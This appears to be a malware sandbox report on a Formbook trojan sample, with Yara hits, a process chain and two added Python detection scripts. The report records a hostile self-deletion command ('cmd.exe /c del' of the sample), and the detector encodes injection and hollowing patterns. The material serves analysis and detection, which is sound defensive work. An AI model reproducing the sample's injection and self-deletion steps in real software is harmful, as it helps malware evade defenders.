          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.35236192272.0000000013989000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 2392, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 7124, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cscript.exe PID: 4960, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
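The Yara hits above are more useful once the memory-dump names are decoded: the same rule firing in a read/write private region of the .NET loader (a staging buffer) means something different from it firing in an executable region of explorer.exe or cscript.exe that is not backed by an image on disk (injected code). The following triage helper is an added example, not part of the Joe Sandbox report or of any of the Yara rule authors' tooling. The page-protection and allocation-type constants are the exact winnt.h values; the assumption, stated in the code, is that the dotted .sdmp name carries the region's page protection in its fifth field and its allocation type in its seventh, which is inferred from the lines on this page rather than from vendor documentation. The sample input is a trimmed copy of the match lines above.

```python
import re
from collections import defaultdict

# Page-protection and allocation-type constants from winnt.h (exact Windows values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # set for every PAGE_EXECUTE* flavour
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMPTION: a Joe Sandbox dump name has the layout
#   <process index>.<phase>.<dump id>.<base>.<page protection>.<flags>.<allocation type>.<flags>.sdmp
# inferred from the report lines themselves, not from vendor documentation.
DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\."
    r"(?P<mtype>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp", re.IGNORECASE)
RULE_RE = re.compile(r"Matched rule:\s*(\S+)")

# Constructed sample: match lines from this report, rule metadata trimmed.
SAMPLE = [
    "Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23",
    "Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC",
    "Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23",
    "Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = ...",
    "Source: 00000006.00000002.35236192272.0000000013989000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows",
    "Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC",
    "Source: Process Memory Space: cscript.exe PID: 4960, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116",
]


def parse_hit(line):
    """Decode one 'Matched rule' line; None for hits without region metadata (MEMORYSTR lines)."""
    m = DUMP_RE.search(line)
    r = RULE_RE.search(line)
    if not m or not r:
        return None
    protect = int(m["protect"], 16)
    mtype = int(m["mtype"], 16)
    return {
        "proc": int(m["proc"], 16),
        "phase": int(m["phase"], 16),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "mtype": MEM_TYPE.get(mtype, hex(mtype)),
        "rule": r.group(1),
        # Executable memory that is not an image mapping is code the loader did not
        # get from disk: the hallmark of injection and process hollowing.
        "unbacked_exec": bool(protect & EXECUTE_MASK) and mtype != 0x1000000,
    }


def triage(lines):
    """Group rule hits by (process, region base) and return one record per region."""
    rules = defaultdict(set)
    meta = {}
    for line in lines:
        hit = parse_hit(line)
        if hit is None:
            continue
        key = (hit["proc"], hit["base"])
        rules[key].add(hit.pop("rule"))
        meta[key] = hit
    out = []
    for key in sorted(rules):
        rec = dict(meta[key])
        rec["rules"] = sorted(rules[key])
        out.append(rec)
    return out


def unbacked_executable_regions(lines):
    """The regions worth dumping first: Formbook matches sitting in RWX memory with no image backing."""
    return [r for r in triage(lines) if r["unbacked_exec"]]


if __name__ == "__main__":
    for r in unbacked_executable_regions(SAMPLE):
        print(f"proc {r['proc']} base {r['base']:#x} {r['protect']} {r['mtype']} rules={r['rules']}")
```

Run against the lines above, the script keeps the three regions that matter for the injection story (process 5 at 0x400000, process 6 at 0x13989000, process 7 at 0x3000000) and drops the two read/write staging buffers in processes 3 and 7.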
          Source: yPURXYpFVuXra2o.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: _0020.SetAccessControl
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: _0020.SetAccessControl
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Y2xY0TW46hlUdOF7rO.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Y2xY0TW46hlUdOF7rO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: _0020.SetAccessControl
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, Y2xY0TW46hlUdOF7rO.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, Y2xY0TW46hlUdOF7rO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Y2xY0TW46hlUdOF7rO.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Y2xY0TW46hlUdOF7rO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: explorer.exe, 00000006.00000003.31963280084.000000000C715000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C680000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C698000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C716000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ;.VBpoq
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@520/1@23/2
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_0040BCDF FormatMessageW,SysAllocString,LocalFree,GetLastError,WideCharToMultiByte,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree | 7_2_0040BCDF
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_004064E0 CLSIDFromString,CoCreateInstance | 7_2_004064E0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_004182B5 FindResourceExW,LoadResource | 7_2_004182B5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yPURXYpFVuXra2o.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Mutant created: NULL
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: yPURXYpFVuXra2o.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO [dbo].[Ventas] ([IdCliente], [IdEmpleado], [Documento], [Serie], [Nro], [Subtotal], [IGV], [Total]) VALUES (@IdCliente, @IdEmpleado, @Documento, @Serie, @Nro, @Subtotal, @IGV, @Total);
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO [dbo].[Detalles] ([IdVenta], [IdProducto], [Cantidad], [Precio]) VALUES (@IdVenta, @IdProducto, @Cantidad, @Precio);
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO [dbo].[Producto] ([Descripcion], [Precio], [Marca]) VALUES (@Descripcion, @Precio, @Marca);
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE [dbo].[Producto] SET [Descripcion] = @Descripcion, [Precio] = @Precio, [Marca] = @Marca WHERE (([IdProducto] = @Original_IdProducto) AND ([Descripcion] = @Original_Descripcion) AND ([Precio] = @Original_Precio) AND ((@IsNull_Marca = 1 AND [Marca] IS NULL) OR ([Marca] = @Original_Marca)));
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE [dbo].[Cliente] SET [Nombres] = @Nombres, [Apellidos] = @Apellidos, [DNI] = @DNI, [Direccion] = @Direccion, [Telefono] = @Telefono WHERE (([IdCliente] = @Original_IdCliente) AND ([Nombres] = @Original_Nombres) AND ([Apellidos] = @Original_Apellidos) AND ((@IsNull_DNI = 1 AND [DNI] IS NULL) OR ([DNI] = @Original_DNI)) AND ((@IsNull_Direccion = 1 AND [Direccion] IS NULL) OR ([Direccion] = @Original_Direccion)) AND ((@IsNull_Telefono = 1 AND [Telefono] IS NULL) OR ([Telefono] = @Original_Telefono)));
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE [dbo].[Detalles] SET [IdVenta] = @IdVenta, [IdProducto] = @IdProducto, [Cantidad] = @Cantidad, [Precio] = @Precio WHERE (([IdVenta] = @Original_IdVenta) AND ([IdProducto] = @Original_IdProducto) AND ([Cantidad] = @Original_Cantidad) AND ([Precio] = @Original_Precio));
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO [dbo].[Cliente] ([Nombres], [Apellidos], [DNI], [Direccion], [Telefono]) VALUES (@Nombres, @Apellidos, @DNI, @Direccion, @Telefono);
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE [dbo].[Empleadoo] SET [Nombre] = @Nombre, [Apellidos] = @Apellidos, [DNI] = @DNI, [Direccion] = @Direccion, [Telefono] = @Telefono WHERE (([IdEmpleado] = @Original_IdEmpleado) AND ([Nombre] = @Original_Nombre) AND ([Apellidos] = @Original_Apellidos) AND ((@IsNull_DNI = 1 AND [DNI] IS NULL) OR ([DNI] = @Original_DNI)) AND ((@IsNull_Direccion = 1 AND [Direccion] IS NULL) OR ([Direccion] = @Original_Direccion)) AND ((@IsNull_Telefono = 1 AND [Telefono] IS NULL) OR ([Telefono] = @Original_Telefono)));
          Source: yPURXYpFVuXra2o.exe, 00000003.00000000.30163627008.0000000000A62000.00000002.00000001.01000000.00000004.sdmp, cscript.exe, 00000007.00000002.35221616070.000000000576F000.00000004.10000000.00040000.00000000.sdmp, cscript.exe, 00000007.00000002.35220125927.0000000004F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE [dbo].[Ventas] SET [IdCliente] = @IdCliente, [IdEmpleado] = @IdEmpleado, [Documento] = @Documento, [Serie] = @Serie, [Nro] = @Nro, [Subtotal] = @Subtotal, [IGV] = @IGV, [Total] = @Total WHERE (([IdVentas] = @Original_IdVentas) AND ([IdCliente] = @Original_IdCliente) AND ([IdEmpleado] = @Original_IdEmpleado) AND ([Documento] = @Original_Documento) AND ([Serie] = @Original_Serie) AND ([Nro] = @Original_Nro) AND ([Subtotal] = @Original_Subtotal) AND ([IGV] = @Original_IGV) AND ([Total] = @Original_Total));
          Source: yPURXYpFVuXra2o.exe | ReversingLabs: Detection: 31%
          Source: yPURXYpFVuXra2o.exe | Virustotal: Detection: 34%
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | File read: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe:Zone.Identifier
          Source: unknown | Process created: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Process created: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
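The process chain recorded above is the part of this report that translates most directly into endpoint detection: the sample re-launches itself with an identical command line, explorer.exe (which the sample injected into) starts cscript.exe with no script to run, and that cscript.exe spawns cmd.exe to delete the original file. The following detector is an added example, not Joe Sandbox output or any vendor's rule. It runs over constructed process-creation events in a Sysmon-like shape; the PIDs 2392, 7124 and 4960 are the ones this report records, every other PID and the benign cscript.exe invocation at the end are made up for the test.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields Sysmon event 1 or EDR telemetry would carry)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
DEL_RE = re.compile(r'\bdel\s+"?(.+?)"?\s*$', re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokens(cmdline):
    # Minimal Windows command-line tokeniser: a quoted string or a run of non-blanks.
    return re.findall(r'"[^"]*"|\S+', cmdline)


def detect(events):
    """Return (pid, reason) alerts for the three patterns seen in this report's process tree."""
    by_pid = {e.pid: e for e in events}
    known_images = {e.image.lower() for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        img = basename(e.image)
        # 1. A script host started by explorer.exe whose command line is only the image path:
        #    cscript.exe with no script does nothing useful, so this is a hollowed-out host.
        if (parent and basename(parent.image) == "explorer.exe"
                and img in SCRIPT_HOSTS and len(tokens(e.cmdline)) <= 1):
            alerts.append((e.pid, "script host launched from explorer.exe with no script argument"))
        # 2. A process spawning a second copy of itself with the same command line,
        #    the usual prelude to hollowing the child (see the two yPURXYpFVuXra2o.exe instances).
        if parent and basename(parent.image) == img and parent.cmdline == e.cmdline:
            alerts.append((e.pid, "process re-launched itself with an identical command line"))
        # 3. cmd.exe /c del <path> where <path> is an executable that ran in this trace:
        #    self-deletion through a child, as cscript.exe does here with the dropped sample.
        if img == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m and m.group(1).lower() in known_images:
                alerts.append((e.pid, "cmd.exe deletes the executable of a process seen in this trace"))
    return alerts


# Constructed sample reproducing the report's process tree. PIDs 2392, 7124 and 4960 are
# from the report; 1000, 5100, 5200 and 6000 (and the benign last event) are invented.
SAMPLE_PATH = r"C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2392, 1000, SAMPLE_PATH, f'"{SAMPLE_PATH}"'),
    ProcEvent(7124, 2392, SAMPLE_PATH, f'"{SAMPLE_PATH}"'),
    ProcEvent(4960, 1000, r"C:\Windows\SysWOW64\cscript.exe", r'"C:\Windows\SysWOW64\cscript.exe"'),
    ProcEvent(5100, 4960, r"C:\Windows\SysWOW64\cmd.exe",
              rf'C:\Windows\SysWOW64\cmd.exe /c del "{SAMPLE_PATH}"'),
    ProcEvent(5200, 5100, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # Benign: explorer.exe starting cscript.exe with an actual script (constructed control case).
    ProcEvent(6000, 1000, r"C:\Windows\System32\cscript.exe",
              r'"C:\Windows\System32\cscript.exe" //nologo C:\Scripts\inventory.vbs'),
]

if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

Three alerts come out of the sample tree (PIDs 7124, 4960 and 5100) and the benign cscript.exe invocation stays quiet because it carries a script path. In production the third rule should compare against a process-image cache rather than only the current batch, since the deleted file's process may have exited before the cmd.exe event arrives.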
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: yPURXYpFVuXra2o.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: yPURXYpFVuXra2o.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
